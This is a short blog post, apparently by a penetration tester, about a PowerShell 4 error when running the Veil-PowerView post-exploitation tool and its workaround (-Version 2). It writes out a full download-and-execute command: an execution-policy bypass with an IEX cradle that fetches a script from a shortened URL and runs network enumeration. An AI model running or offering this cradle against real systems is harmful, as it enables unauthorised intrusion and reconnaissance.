I ran into a little problem when attempting to run Veil-PowerView on a Windows 8.1 box running PowerShell version 4 that also included some issues with running shells remotely. I just wanted to share my findings. Not anything astounding, but I hope I can save somebody some time. I wanted to run PowerView in memory by pulling it down from the web as shown in the @harmj0y article here. The command is as follows:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mYPUO4'); Invoke-NetView -Ping | Out-File -Encoding ascii netview.txt"
But PowerShell doesn’t seem too happy at all and vomits errors all over my screen. The error states that you need to add the -Version 2 option. Let’s have a go and see if it works:
So it seems that after that PowerView goes about its merry way, and it does, but this is just running it on a local machine in front of me. So nothing mind-blowing here, but I did a little further research to discover how to do this when running a remote session and found this TechNet article. I’m going to continue looking into this and possibly script something up to assist with running post-exploitation tools on clients running PowerShell 4.
So I reported the error to @harmj0y and he has added a warning to Veil-PowerView to make sure everybody knows to add -Version 2. It’s shown here:
I’m going to do more research to see if this argument can be forced in some way.